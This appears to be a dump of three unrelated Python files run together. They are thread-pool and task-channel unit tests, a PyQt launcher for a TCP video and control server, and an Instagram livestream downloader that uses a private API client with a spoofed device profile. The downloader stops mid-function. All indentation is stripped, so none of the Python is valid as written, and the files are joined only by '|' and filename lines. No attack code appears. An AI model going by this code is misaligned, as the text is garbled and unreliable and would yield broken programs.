"""Returns function that sleeps |duration| sec and returns its argument."""
def task(arg):
time.sleep(duration)
return arg
return task
def retrying_sleep_task(self, duration=0.01):
"""Returns function that adds sleep_task to the thread pool."""
def task(arg):
self.thread_pool.add_task(0, self.sleep_task(duration), arg)
return task
@staticmethod
def none_task():
"""Returns function that returns None."""
return lambda _arg: None
def setUp(self):
super(ThreadPoolTest, self).setUp()
self.thread_pool = threading_utils.ThreadPool(
self.MIN_THREADS, self.MAX_THREADS, 0)
@timeout(10)
def tearDown(self):
super(ThreadPoolTest, self).tearDown()
self.thread_pool.close()
def get_results_via_join(self, _expected):
return self.thread_pool.join()
def get_results_via_get_one_result(self, expected):
return [self.thread_pool.get_one_result() for _ in expected]
def get_results_via_iter_results(self, _expected):
return list(self.thread_pool.iter_results())
def run_results_test(self, task, results_getter, args=None, expected=None):
"""Template function for tests checking that pool returns all results.
Will add multiple instances of |task| to the thread pool, then call
|results_getter| to get back all results and compare them to expected ones.
"""
args = range(0, 100) if args is None else args
expected = args if expected is None else expected
msg = 'Using \'%s\' to get results.' % (results_getter.__name__,)
for i in args:
self.thread_pool.add_task(0, task, i)
results = results_getter(expected)
# Check that got all results back (exact same set, no duplicates).
self.assertEqual(set(expected), set(results), msg)
self.assertEqual(len(expected), len(results), msg)
# Queue is empty, result request should fail.
with self.assertRaises(threading_utils.ThreadPoolEmpty):
self.thread_pool.get_one_result()
@timeout(10)
def test_get_one_result_ok(self):
self.thread_pool.add_task(0, lambda: 'OK')
self.assertEqual(self.thread_pool.get_one_result(), 'OK')
@timeout(10)
def test_get_one_result_fail(self):
# No tasks added -> get_one_result raises an exception.
with self.assertRaises(threading_utils.ThreadPoolEmpty):
self.thread_pool.get_one_result()
@timeout(30)
def test_join(self):
self.run_results_test(self.sleep_task(),
self.get_results_via_join)
@timeout(30)
def test_get_one_result(self):
self.run_results_test(self.sleep_task(),
self.get_results_via_get_one_result)
@timeout(30)
def test_iter_results(self):
self.run_results_test(self.sleep_task(),
self.get_results_via_iter_results)
@timeout(30)
def test_retry_and_join(self):
self.run_results_test(self.retrying_sleep_task(),
self.get_results_via_join)
@timeout(30)
def test_retry_and_get_one_result(self):
self.run_results_test(self.retrying_sleep_task(),
self.get_results_via_get_one_result)
@timeout(30)
def test_retry_and_iter_results(self):
self.run_results_test(self.retrying_sleep_task(),
self.get_results_via_iter_results)
@timeout(30)
def test_none_task_and_join(self):
self.run_results_test(self.none_task(),
self.get_results_via_join,
expected=[])
@timeout(30)
def test_none_task_and_get_one_result(self):
self.thread_pool.add_task(0, self.none_task(), 0)
with self.assertRaises(threading_utils.ThreadPoolEmpty):
self.thread_pool.get_one_result()
@timeout(30)
def test_none_task_and_and_iter_results(self):
self.run_results_test(self.none_task(),
self.get_results_via_iter_results,
expected=[])
@timeout(30)
def test_generator_task(self):
MULTIPLIER = 1000
COUNT = 10
# Generator that yields [i * MULTIPLIER, i * MULTIPLIER + COUNT).
def generator_task(i):
for j in range(COUNT):
time.sleep(0.001)
yield i * MULTIPLIER + j
# Arguments for tasks and expected results.
args = range(0, 10)
expected = [i * MULTIPLIER + j for i in args for j in range(COUNT)]
# Test all possible ways to pull results from the thread pool.
getters = (self.get_results_via_join,
self.get_results_via_iter_results,
self.get_results_via_get_one_result,)
for results_getter in getters:
self.run_results_test(generator_task, results_getter, args, expected)
@timeout(30)
def test_concurrent_iter_results(self):
def poller_proc(result):
result.extend(self.thread_pool.iter_results())
args = range(0, 100)
for i in args:
self.thread_pool.add_task(0, self.sleep_task(), i)
# Start a bunch of threads, all calling iter_results in parallel.
pollers = []
for _ in range(0, 4):
result = []
poller = threading.Thread(target=poller_proc, args=(result,))
poller.start()
pollers.append((poller, result))
# Collects results from all polling threads.
all_results = []
for poller, results in pollers:
poller.join()
all_results.extend(results)
# Check that got all results back (exact same set, no duplicates).
self.assertEqual(set(args), set(all_results))
self.assertEqual(len(args), len(all_results))
@timeout(10)
def test_adding_tasks_after_close(self):
pool = threading_utils.ThreadPool(1, 1, 0)
pool.add_task(0, lambda: None)
pool.close()
with self.assertRaises(threading_utils.ThreadPoolClosed):
pool.add_task(0, lambda: None)
@timeout(10)
def test_double_close(self):
pool = threading_utils.ThreadPool(1, 1, 0)
pool.close()
with self.assertRaises(threading_utils.ThreadPoolClosed):
pool.close()
def test_priority(self):
# Verifies that a lower priority is run first.
with threading_utils.ThreadPool(1, 1, 0) as pool:
lock = threading.Lock()
def wait_and_return(x):
with lock:
return x
def return_x(x):
return x
with lock:
pool.add_task(0, wait_and_return, 'a')
pool.add_task(2, return_x, 'b')
pool.add_task(1, return_x, 'c')
actual = pool.join()
self.assertEqual(['a', 'c', 'b'], actual)
# Disabled due to https://crbug.com/778055
@timeout(30)
def disabled_test_abort(self):
# Trigger a ridiculous amount of tasks, and abort the remaining.
completed = False
results = []
try:
with threading_utils.ThreadPool(2, 2, 0) as pool:
# Allow 10 tasks to run initially.
sem = threading.Semaphore(10)
def grab_and_return(x):
sem.acquire()
return x
for i in range(100):
pool.add_task(0, grab_and_return, i)
# Running at 11 would hang.
results = [pool.get_one_result() for _ in range(10)]
# At that point, there's 10 completed tasks and 2 tasks hanging, 88
# pending.
self.assertEqual(88, pool.abort())
# Calling .join() before these 2 .release() would hang.
sem.release()
sem.release()
results.extend(pool.join())
# The results *may* be out of order. Even if the calls are processed
# strictly in FIFO mode, a thread may preempt another one when returning
# the values.
self.assertEqual(range(12), sorted(results))
completed = True
finally:
# Print debug data if it failed.
if not completed:
print(results)
class AutoRetryThreadPoolTest(unittest.TestCase):
def test_bad_class(self):
exceptions = [AutoRetryThreadPoolTest]
with self.assertRaises(AssertionError):
threading_utils.AutoRetryThreadPool(exceptions, 1, 0, 1, 0)
def test_no_exception(self):
with self.assertRaises(AssertionError):
threading_utils.AutoRetryThreadPool([], 1, 0, 1, 0)
def test_bad_retry(self):
exceptions = [IOError]
with self.assertRaises(AssertionError):
threading_utils.AutoRetryThreadPool(exceptions, 256, 0, 1, 0)
def test_bad_priority(self):
exceptions = [IOError]
with threading_utils.AutoRetryThreadPool(exceptions, 1, 1, 1, 0) as pool:
pool.add_task(0, lambda x: x, 0)
pool.add_task(256, lambda x: x, 0)
pool.add_task(512, lambda x: x, 0)
with self.assertRaises(AssertionError):
pool.add_task(1, lambda x: x, 0)
with self.assertRaises(AssertionError):
pool.add_task(255, lambda x: x, 0)
def test_priority(self):
# Verifies that a lower priority is run first.
exceptions = [IOError]
with threading_utils.AutoRetryThreadPool(exceptions, 1, 1, 1, 0) as pool:
lock = threading.Lock()
def wait_and_return(x):
with lock:
return x
def return_x(x):
return x
with lock:
pool.add_task(threading_utils.PRIORITY_HIGH, wait_and_return, 'a')
pool.add_task(threading_utils.PRIORITY_LOW, return_x, 'b')
pool.add_task(threading_utils.PRIORITY_MED, return_x, 'c')
actual = pool.join()
self.assertEqual(['a', 'c', 'b'], actual)
def test_retry_inherited(self):
# Exception class inheritance works.
class CustomException(IOError):
pass
ran = []
def throw(to_throw, x):
ran.append(x)
if to_throw:
raise to_throw.pop(0)
return x
with threading_utils.AutoRetryThreadPool([IOError], 1, 1, 1, 0) as pool:
pool.add_task(
threading_utils.PRIORITY_MED, throw, [CustomException('a')], 'yay')
actual = pool.join()
self.assertEqual(['yay'], actual)
self.assertEqual(['yay', 'yay'], ran)
def test_retry_2_times(self):
exceptions = [IOError, OSError]
to_throw = [OSError('a'), IOError('b')]
def throw(x):
if to_throw:
raise to_throw.pop(0)
return x
with threading_utils.AutoRetryThreadPool(exceptions, 2, 1, 1, 0) as pool:
pool.add_task(threading_utils.PRIORITY_MED, throw, 'yay')
actual = pool.join()
self.assertEqual(['yay'], actual)
def test_retry_too_many_times(self):
exceptions = [IOError, OSError]
to_throw = [OSError('a'), IOError('b')]
def throw(x):
if to_throw:
raise to_throw.pop(0)
return x
with threading_utils.AutoRetryThreadPool(exceptions, 1, 1, 1, 0) as pool:
pool.add_task(threading_utils.PRIORITY_MED, throw, 'yay')
with self.assertRaises(IOError):
pool.join()
def test_retry_mutation_1(self):
# This is to warn that mutable arguments WILL be mutated.
def throw(to_throw, x):
if to_throw:
raise to_throw.pop(0)
return x
exceptions = [IOError, OSError]
with threading_utils.AutoRetryThreadPool(exceptions, 1, 1, 1, 0) as pool:
pool.add_task(
threading_utils.PRIORITY_MED,
throw,
[OSError('a'), IOError('b')],
'yay')
with self.assertRaises(IOError):
pool.join()
def test_retry_mutation_2(self):
# This is to warn that mutable arguments WILL be mutated.
def throw(to_throw, x):
if to_throw:
raise to_throw.pop(0)
return x
exceptions = [IOError, OSError]
with threading_utils.AutoRetryThreadPool(exceptions, 2, 1, 1, 0) as pool:
pool.add_task(
threading_utils.PRIORITY_MED,
throw,
[OSError('a'), IOError('b')],
'yay')
actual = pool.join()
self.assertEqual(['yay'], actual)
def test_retry_interleaved(self):
# Verifies that retries are interleaved. This is important, we don't want a
# retried task to take all the pool during retries.
exceptions = [IOError, OSError]
lock = threading.Lock()
ran = []
with threading_utils.AutoRetryThreadPool(exceptions, 2, 1, 1, 0) as pool:
def lock_and_throw(to_throw, x):
with lock:
ran.append(x)
if to_throw:
raise to_throw.pop(0)
return x
with lock:
pool.add_task(
threading_utils.PRIORITY_MED,
lock_and_throw,
[OSError('a'), IOError('b')],
'A')
pool.add_task(
threading_utils.PRIORITY_MED,
lock_and_throw,
[OSError('a'), IOError('b')],
'B')
actual = pool.join()
self.assertEqual(['A', 'B'], actual)
# Retries are properly interleaved:
self.assertEqual(['A', 'B', 'A', 'B', 'A', 'B'], ran)
def test_add_task_with_channel_success(self):
with threading_utils.AutoRetryThreadPool([OSError], 2, 1, 1, 0) as pool:
channel = threading_utils.TaskChannel()
pool.add_task_with_channel(channel, 0, lambda: 0)
self.assertEqual(0, next(channel))
def test_add_task_with_channel_fatal_error(self):
with threading_utils.AutoRetryThreadPool([OSError], 2, 1, 1, 0) as pool:
channel = threading_utils.TaskChannel()
def throw(exc):
raise exc
pool.add_task_with_channel(channel, 0, throw, ValueError())
with self.assertRaises(ValueError):
next(channel)
def test_add_task_with_channel_retryable_error(self):
with threading_utils.AutoRetryThreadPool([OSError], 2, 1, 1, 0) as pool:
channel = threading_utils.TaskChannel()
def throw(exc):
raise exc
pool.add_task_with_channel(channel, 0, throw, OSError())
with self.assertRaises(OSError):
next(channel)
def test_add_task_with_channel_captures_stack_trace(self):
with threading_utils.AutoRetryThreadPool([OSError], 2, 1, 1, 0) as pool:
channel = threading_utils.TaskChannel()
def throw(exc):
def function_with_some_unusual_name():
raise exc
function_with_some_unusual_name()
pool.add_task_with_channel(channel, 0, throw, OSError())
exc_traceback = ''
try:
next(channel)
except OSError:
exc_traceback = traceback.format_exc()
self.assertIn('function_with_some_unusual_name', exc_traceback)
def test_max_value(self):
self.assertEqual(16, threading_utils.IOAutoRetryThreadPool.MAX_WORKERS)
class FakeProgress:
@staticmethod
def print_update():
pass
class WorkerPoolTest(unittest.TestCase):
def test_normal(self):
mapper = lambda value: -value
progress = FakeProgress()
with threading_utils.ThreadPoolWithProgress(progress, 8, 8, 0) as pool:
for i in range(32):
pool.add_task(0, mapper, i)
results = pool.join()
self.assertCountEqual(range(-31, 1), results)
def test_exception(self):
class FearsomeException(Exception):
pass
def mapper(value):
raise FearsomeException(value)
task_added = False
try:
progress = FakeProgress()
with threading_utils.ThreadPoolWithProgress(progress, 8, 8, 0) as pool:
pool.add_task(0, mapper, 0)
task_added = True
pool.join()
self.fail()
except FearsomeException:
self.assertEqual(True, task_added)
class TaskChannelTest(unittest.TestCase):
def test_generator(self):
channel = threading_utils.TaskChannel()
channel.send_result(1)
channel.send_result(2)
channel.send_done()
channel.send_done()
channel.send_result(3)
channel.send_done()
actual = list(channel)
self.assertEqual([1, 2], actual)
actual = list(channel)
self.assertEqual([], actual)
actual = list(channel)
self.assertEqual([3], actual)
def test_passes_simple_value(self):
with threading_utils.ThreadPool(1, 1, 0) as tp:
channel = threading_utils.TaskChannel()
tp.add_task(0, lambda: channel.send_result(0))
self.assertEqual(0, next(channel))
def test_passes_exception_value(self):
with threading_utils.ThreadPool(1, 1, 0) as tp:
channel = threading_utils.TaskChannel()
tp.add_task(0, lambda: channel.send_result(Exception()))
self.assertTrue(isinstance(next(channel), Exception))
def test_wrap_task_passes_simple_value(self):
with threading_utils.ThreadPool(1, 1, 0) as tp:
channel = threading_utils.TaskChannel()
tp.add_task(0, channel.wrap_task(lambda: 0))
self.assertEqual(0, next(channel))
def test_wrap_task_passes_exception_value(self):
with threading_utils.ThreadPool(1, 1, 0) as tp:
channel = threading_utils.TaskChannel()
tp.add_task(0, channel.wrap_task(Exception))
self.assertTrue(isinstance(next(channel), Exception))
def test_send_exception_raises_exception(self):
class CustomError(Exception):
pass
with threading_utils.ThreadPool(1, 1, 0) as tp:
channel = threading_utils.TaskChannel()
exc_info = (CustomError, CustomError(), None)
tp.add_task(0, lambda: channel.send_exception(exc_info))
with self.assertRaises(CustomError):
next(channel)
def test_wrap_task_raises_exception(self):
class CustomError(Exception):
pass
with threading_utils.ThreadPool(1, 1, 0) as tp:
channel = threading_utils.TaskChannel()
def task_func():
raise CustomError()
tp.add_task(0, channel.wrap_task(task_func))
with self.assertRaises(CustomError):
next(channel)
def test_wrap_task_exception_captures_stack_trace(self):
class CustomError(Exception):
pass
with threading_utils.ThreadPool(1, 1, 0) as tp:
channel = threading_utils.TaskChannel()
def task_func():
def function_with_some_unusual_name():
raise CustomError()
function_with_some_unusual_name()
tp.add_task(0, channel.wrap_task(task_func))
exc_traceback = ''
try:
next(channel)
except CustomError:
exc_traceback = traceback.format_exc()
self.assertIn('function_with_some_unusual_name', exc_traceback)
def test_next_timeout(self):
with threading_utils.ThreadPool(1, 1, 0) as tp:
channel = threading_utils.TaskChannel()
def task_func():
# This test ultimately relies on the condition variable primitive
# provided by pthreads. There's no easy way to mock time for it.
# Increase this duration if the test is flaky.
time.sleep(0.2)
return 123
tp.add_task(0, channel.wrap_task(task_func))
with self.assertRaises(threading_utils.TaskChannel.Timeout):
channel.next(timeout=0.001)
self.assertEqual(123, next(channel))
def test_timeout_exception_from_task(self):
with threading_utils.ThreadPool(1, 1, 0) as tp:
channel = threading_utils.TaskChannel()
def task_func():
raise threading_utils.TaskChannel.Timeout()
tp.add_task(0, channel.wrap_task(task_func))
# 'Timeout' raised by task gets transformed into 'RuntimeError'.
with self.assertRaises(RuntimeError):
next(channel)
if __name__ == '__main__':
test_env.main()
|
main.py
|
# -*- coding: utf-8 -*-
import sys,getopt
from ui_server import Ui_server
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from Server import *
class MyWindow(QMainWindow,Ui_server):
def __init__(self):
self.user_ui=True
self.start_tcp=False
self.server=Server()
self.parseOpt()
if self.user_ui:
self.app = QApplication(sys.argv)
super(MyWindow,self).__init__()
self.setupUi(self)
self.pushButton_On_And_Off.clicked.connect(self.on_and_off_server)
self.on_and_off_server()
if self.start_tcp:
self.server.turn_on_server()
self.server.tcp_flag=True
self.video=threading.Thread(target=self.server.transmission_video)
self.video.start()
self.instruction=threading.Thread(target=self.server.receive_instruction)
self.instruction.start()
if self.user_ui:
self.pushButton_On_And_Off.setText('Off')
self.states.setText('On')
def parseOpt(self):
self.opts,self.args = getopt.getopt(sys.argv[1:],"tn")
for o,a in self.opts:
if o in ('-t'):
print ("Open TCP")
self.start_tcp=True
elif o in ('-n'):
self.user_ui=False
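    # Illustrative invocations (hedged, based on the flags parsed above):
    #   python main.py        start with the Qt UI
    #   python main.py -t     also open the TCP server and start the video/instruction threads immediately
    #   python main.py -n     run headless, without the Qt UI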
def on_and_off_server(self):
if self.pushButton_On_And_Off.text() == 'On':
self.pushButton_On_And_Off.setText('Off')
self.states.setText('On')
self.server.turn_on_server()
self.server.tcp_flag=True
self.video=threading.Thread(target=self.server.transmission_video)
self.video.start()
self.instruction=threading.Thread(target=self.server.receive_instruction)
self.instruction.start()
else:
self.pushButton_On_And_Off.setText('On')
self.states.setText('Off')
self.server.tcp_flag=False
try:
stop_thread(self.video)
stop_thread(self.instruction)
except Exception as e:
print(e)
self.server.turn_off_server()
print("close")
def closeEvent(self,event):
try:
stop_thread(self.video)
stop_thread(self.instruction)
except:
pass
try:
self.server.server_socket.shutdown(2)
self.server.server_socket1.shutdown(2)
self.server.turn_off_server()
except:
pass
if self.user_ui:
QCoreApplication.instance().quit()
os._exit(0)
if __name__ == '__main__':
myshow=MyWindow()
if myshow.user_ui==True:
myshow.show();
sys.exit(myshow.app.exec_())
else:
try:
pass
except KeyboardInterrupt:
myshow.closeEvent(myshow)
|
download.py
|
#!/usr/bin/env python
import logging
import sys
import os
import time
import datetime
import argparse
import getpass
import json
import threading
import webbrowser
import shutil
import subprocess
from socket import timeout, error as SocketError
from ssl import SSLError
from string import Formatter as StringFormatter
import glob
try:
# py2
from urllib2 import URLError
from httplib import HTTPException
from ConfigParser import SafeConfigParser
except ImportError:
# py3
from urllib.error import URLError
from http.client import HTTPException
from configparser import SafeConfigParser
from instagram_private_api import (
Client, ClientError, ClientCookieExpiredError, ClientLoginRequiredError
)
from instagram_private_api_extensions.live import (
Downloader, logger as dash_logger
)
from instagram_private_api_extensions.replay import (
Downloader as ReplayDownloader, logger as replay_dash_logger
)
from .utils import (
Formatter, UserConfig, check_for_updates,
to_json, from_json, generate_safe_path
)
from .comments import CommentsDownloader
__version__ = '0.3.8'
USERNAME_ENV_KEY = 'IG_LOGIN_USERNAME'
PASSWORD_ENV_KEY = 'IG_LOGIN_PASSWORD'
logger = logging.getLogger(__file__)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = Formatter()
ch.setFormatter(formatter)
logger.addHandler(ch)
dash_logger.addHandler(ch)
replay_dash_logger.addHandler(ch)
api_logger = logging.getLogger('instagram_private_api')
api_logger.addHandler(ch)
rule_line = '-' * 80
def onlogin_callback(api, new_settings_file):
# saved auth cookies on login
cache_settings = api.settings
with open(new_settings_file, 'w') as outfile:
json.dump(cache_settings, outfile, indent=2, default=to_json)
logger.debug('Saved settings: %s' % new_settings_file)
def check_ffmpeg(binary_path):
ffmpeg_binary = binary_path or os.getenv('FFMPEG_BINARY', 'ffmpeg')
cmd = [
ffmpeg_binary, '-version']
logger.debug('Executing: "%s"' % ' '.join(cmd))
exit_code = subprocess.call(cmd)
logger.debug('Exit code: %s' % exit_code)
def is_replay(broadcast):
return broadcast['broadcast_status'] == 'post_live' or 'dash_playback_url' not in broadcast
def generate_filename_prefix(broadcast, userconfig):
if is_replay(broadcast):
broadcast_start = datetime.datetime.fromtimestamp(broadcast['published_time'])
broadcast_type = 'replay'
else:
broadcast_start = datetime.datetime.now()
broadcast_type = 'live'
format_args = {
'year': broadcast_start.strftime('%Y'),
'month': broadcast_start.strftime('%m'),
'day': broadcast_start.strftime('%d'),
'hour': broadcast_start.strftime('%H'),
'minute': broadcast_start.strftime('%M'),
'username': broadcast['broadcast_owner']['username'],
'broadcastid': broadcast['id'],
'broadcasttype': broadcast_type,
}
user_format_keys = StringFormatter().parse(userconfig.filenameformat)
invalid_user_format_keys = [
i[1] for i in user_format_keys if i[1] not in format_args.keys()]
if invalid_user_format_keys:
logger.error(
'Invalid filename format parameters: %s'
% ', '.join(invalid_user_format_keys))
exit(10)
filename_prefix = userconfig.filenameformat.format(**format_args)
return filename_prefix
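# Illustrative example (hypothetical broadcast): with the default format string
# '{year}{month}{day}_{username}_{broadcastid}_{broadcasttype}', a live broadcast
# by "someuser" with id 12345 starting on 2018-01-31 is rendered as
# "20180131_someuser_12345_live".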
def run():
description = ('INSTAGRAM LIVESTREAM DOWNLOADER (v%s) [python=%s.%s.%s,%s]'
% (__version__,
sys.version_info.major, sys.version_info.minor, sys.version_info.micro,
sys.platform))
config_section = 'livestream_dl'
cfgparser = None
if os.path.exists('livestream_dl.cfg'):
        # read options from the config file
cfgparser = SafeConfigParser()
cfgparser.read('livestream_dl.cfg')
parser = argparse.ArgumentParser(
description=description,
epilog='Release: v%s / %s / %s' % (__version__, sys.platform, sys.version))
parser.add_argument('instagram_user', nargs='?')
parser.add_argument('-settings', dest='settings', type=str,
help='File path to save settings.json')
parser.add_argument('-username', '-u', dest='username', type=str,
help='Login user name. Required if %s env var not set.'
% USERNAME_ENV_KEY)
parser.add_argument('-password', '-p', dest='password', type=str, required=False,
help='Login password. Can be set via %s env var.'
% PASSWORD_ENV_KEY)
parser.add_argument('-outputdir', '-o', dest='outputdir',
help='Output folder path.')
parser.add_argument('-commenters', metavar='COMMENTER_ID', dest='commenters', nargs='*',
help='List of numeric IG user IDs to collect comments from.')
parser.add_argument('-collectcomments', action='store_true',
help='Collect comments from verified users.')
parser.add_argument('-nocleanup', action='store_true',
help='Do not clean up temporary downloaded/generated files.')
parser.add_argument('-openwhendone', action='store_true',
help='Automatically open movie file when completed.')
parser.add_argument('-mpdtimeout', dest='mpdtimeout', type=int,
help='Set timeout interval in seconds for mpd download. Default %d.'
% Downloader.MPD_DOWNLOAD_TIMEOUT)
parser.add_argument('-downloadtimeout', dest='downloadtimeout', type=int,
help='Set timeout interval in seconds for segments download. Default %d.'
% Downloader.DOWNLOAD_TIMEOUT)
parser.add_argument('-ffmpegbinary', dest='ffmpegbinary', type=str,
help='Custom path to ffmpeg binary.')
parser.add_argument('-skipffmpeg', dest='skipffmpeg', action='store_true',
help='Don\'t assemble file with ffmpeg.')
parser.add_argument('-verbose', dest='verbose', action='store_true',
help='Enable verbose debug messages.')
parser.add_argument('-log', dest='log',
help='Log to file specified.')
parser.add_argument('-filenameformat', dest='filenameformat', type=str,
help='Custom filename format.')
parser.add_argument('-noreplay', dest='noreplay', action='store_true',
help='Do not download replay streams.')
parser.add_argument('-ignoreconfig', dest='ignoreconfig', action='store_true',
help='Ignore the livestream_dl.cfg file.')
parser.add_argument('-version', dest='version_check', action='store_true',
help='Show current version and check for new updates.')
argparser = parser.parse_args()
    # show help and exit unless an IG user or a version check was requested
if not (argparser.instagram_user or argparser.version_check):
parser.parse_args(['-h'])
exit()
if argparser.ignoreconfig:
cfgparser = None
logger.debug('Ignoring config file.')
default_config = {
'outputdir': 'downloaded',
'commenters': [],
'collectcomments': False,
'nocleanup': False,
'openwhendone': False,
'mpdtimeout': Downloader.MPD_DOWNLOAD_TIMEOUT,
'downloadtimeout': Downloader.DOWNLOAD_TIMEOUT,
'verbose': False,
'skipffmpeg': False,
'ffmpegbinary': None,
'filenameformat': '{year}{month}{day}_{username}_{broadcastid}_{broadcasttype}',
}
userconfig = UserConfig(
config_section, defaults=default_config,
argparser=argparser, configparser=cfgparser)
if userconfig.verbose:
logger.setLevel(logging.DEBUG)
api_logger.setLevel(logging.DEBUG)
dash_logger.setLevel(logging.DEBUG)
replay_dash_logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
dash_logger.setLevel(logging.INFO)
replay_dash_logger.setLevel(logging.INFO)
if userconfig.log:
file_handler = logging.FileHandler(userconfig.log)
file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s'))
logger.addHandler(file_handler)
dash_logger.addHandler(file_handler)
replay_dash_logger.addHandler(file_handler)
api_logger.addHandler(file_handler)
logger.info(description)
if userconfig.verbose:
check_ffmpeg(userconfig.ffmpegbinary)
if argparser.version_check:
message = check_for_updates(__version__)
if message:
logger.warning(message)
else:
logger.info('[i] No new version found.')
logger.info('=-' * 40)
if not argparser.instagram_user:
exit()
user_username = userconfig.username or os.getenv(USERNAME_ENV_KEY)
if not user_username:
logger.error('No login username specified.')
exit(9)
user_password = (userconfig.password or os.getenv(PASSWORD_ENV_KEY) or
getpass.getpass(
prompt='Type in the password for %s and press "Enter" '
'\n(Your password will not show on screen): '
% user_username))
settings_file_path = userconfig.settings or ('%s.json' % user_username)
# don't use default device profile
custom_device = {
'phone_manufacturer': 'samsung',
'phone_model': 'hero2lte',
'phone_device': 'SM-G935F',
'android_release': '6.0.1',
'android_version': 23,
'phone_dpi': '640dpi',
'phone_resolution': '1440x2560',
'phone_chipset': 'samsungexynos8890'
}
api = None
try:
if not os.path.isfile(settings_file_path):
# login afresh
api = Client(
user_username, user_password,
on_login=lambda x: onlogin_callback(x, settings_file_path),
**custom_device)
else:
# reuse cached auth
with open(settings_file_path) as file_data:
cached_settings = json.load(file_data, object_hook=from_json)
# always use latest app ver, sig key, etc from lib
for key in ('app_version', 'signature_key', 'key_version', 'ig_capabilities'):
cached_settings.pop(key, None)
api = Client(
user_username, user_password,
settings=cached_settings,
**custom_device)
except (ClientCookieExpiredError, ClientLoginRequiredError) as e:
logger.warning('ClientCookieExpiredError/ClientLoginRequiredError: %s' % e)
api = Client(
user_username, user_password,
on_login=lambda x: onlogin_callback(x, settings_file_path),
**custom_device)
except ClientError as e:
logger.error('ClientError %s (Code: %d, Response: %s)' % (e.msg, e.code, e.error_response))
exit(9)
except Exception as e:
logger.error('Unexpected Exception: %s' % e)
exit(99)
if not api:
logger.error('Unable to init api client')
exit(99)
if user_username != api.authenticated_user_name:
logger.warning(
'Authenticated username mismatch: %s vs %s'
% (user_username, api.authenticated_user_name))
retry_attempts = 2
res = {}
ig_user_id = ''
for i in range(1, 1 + retry_attempts):
try:
            # Allow the user to save an api call by directly specifying the IG numeric user ID
if argparser.instagram_user.isdigit():
# is a numeric IG user ID
ig_user_id = argparser.instagram_user
else:
# regular ig user name
user_res = api.username_info(argparser.instagram_user)
ig_user_id = user_res['user']['pk']
res = api.user_story_feed(ig_user_id)
break
except ClientLoginRequiredError as e:
if i < retry_attempts:
# Probably because user has changed password somewhere else
logger.warning('ClientLoginRequiredError. Logging in again...')
api = Client(
user_username, user_password,
on_login=lambda x: onlogin_callback(x, settings_file_path),
**custom_device)
else:
raise e
except (SSLError, timeout, URLError, HTTPException, SocketError) as e:
if i < retry_attempts:
logger.warning(str(e))
time.sleep(userconfig.downloadtimeout)
else:
logger.error(str(e))
exit(99)
if not res.get('broadcast') and (
userconfig.noreplay or
not res.get('post_live_item', {}).get('broadcasts')):
logger.info('No broadcast from %s' % ig_user_id)
exit(0)
if res.get('broadcast'):
broadcasts = [res['broadcast']]
else:
broadcasts = res['post_live_item']['broadcasts']
for broadcast in broadcasts:
if broadcast['broadcast_status'] not in ['active', 'post_live']:
# Usually because it's interrupted
logger.warning('Broadcast status is currently: %s' % broadcast['broadcast_status'])
        # create the output dir if it does not exist yet
if not os.path.exists(userconfig.outputdir):
os.makedirs(userconfig.outputdir)
is_replay_broadcast = is_replay(broadcast)
download_start_time = int(time.time())
filename_prefix = generate_filename_prefix(broadcast, userconfig)
# dash_abr_playback_url has the higher def stream
mpd_url = (broadcast.get('dash_manifest')
or broadcast.get('dash_abr_playback_url')
or broadcast['dash_playback_url'])
# Print broadcast info to console
logger.info(rule_line)
started_mins, started_secs = divmod((int(time.time()) - broadcast['published_time']), 60)
logger.info('Broadcast by: %s \t(%s)\tType: %s' % (
broadcast['broadcast_owner']['username'],
broadcast['id'],
'Live' if not is_replay_broadcast else 'Replay')
)
if not is_replay_broadcast:
started_label = '%dm' % started_mins
if started_secs:
started_label += ' %ds' % started_secs
logger.info(
'Viewers: %d \t\tStarted: %s ago' % (
broadcast.get('viewer_count', 0),
started_label)
)
logger.info('Dash URL: %s' % mpd_url)
logger.info(rule_line)
# Record the delay = duration of the stream that has been missed
broadcast['delay'] = ((download_start_time - broadcast['published_time'])
if not is_replay_broadcast else 0)
# folder path for downloaded segments
mpd_output_dir = generate_safe_path(
'%s_downloads' % filename_prefix, userconfig.outputdir, is_file=False)
# file path to save the stream's info
meta_json_file = generate_safe_path('%s.json' % filename_prefix, userconfig.outputdir)
# file path to save collected comments
comments_json_file = generate_safe_path('%s_comments.json' % filename_prefix, userconfig.outputdir)
if is_replay_broadcast:
# ------------- REPLAY broadcast -------------
dl = ReplayDownloader(mpd=mpd_url, output_dir=mpd_output_dir, user_agent=api.user_agent)
duration = dl.duration
broadcast['duration'] = duration
if duration:
duration_mins, duration_secs = divmod(duration, 60)
if started_mins < 60:
started_label = '%dm %ds' % (started_mins, started_secs)
else:
started_label = '%dh %dm' % divmod(started_mins, 60)
logger.info(
'Duration: %dm %ds \t\tStarted: %s ago' % (
duration_mins, duration_secs, started_label)
)
logger.info(rule_line)
# Detect if this replay has already been downloaded
if glob.glob(os.path.join(userconfig.outputdir, '%s.*' % filename_prefix)):
# Already downloaded, so skip
logger.warning('This broadcast is already downloaded.')
# Remove created empty folder
if os.path.isdir(mpd_output_dir):
os.rmdir(mpd_output_dir)
continue
# Good to go
logger.info('Downloading into %s ...' % mpd_output_dir)
logger.info('[i] To interrupt the download, press CTRL+C')
final_output = generate_safe_path('%s.mp4' % filename_prefix, userconfig.outputdir)
try:
generated_files = dl.download(
final_output, skipffmpeg=userconfig.skipffmpeg,
cleartempfiles=(not userconfig.nocleanup))
                # Save the meta file only after a successful download
                # so that it doesn't trip the already-downloaded check above
with open(meta_json_file, 'w') as outfile:
json.dump(broadcast, outfile, indent=2)
logger.info(rule_line)
if not userconfig.skipffmpeg:
logger.info('Generated file(s): \n%s' % '\n'.join(generated_files))
else:
logger.info('Skipped generating file.')
logger.info(rule_line)
if userconfig.commenters or userconfig.collectcomments:
logger.info('Collecting comments...')
cdl = CommentsDownloader(
api=api, broadcast=broadcast, destination_file=comments_json_file,
user_config=userconfig, logger=logger)
cdl.get_replay()
# Generate srt from comments collected
if cdl.comments:
logger.info('Generating comments file...')
srt_filename = final_output.replace('.mp4', '.srt')
CommentsDownloader.generate_srt(
cdl.comments, broadcast['published_time'], srt_filename,
comments_delay=0)
logger.info('Comments written to: %s' % srt_filename)
logger.info(rule_line)
except KeyboardInterrupt:
logger.info('Download interrupted')
except Exception as e:
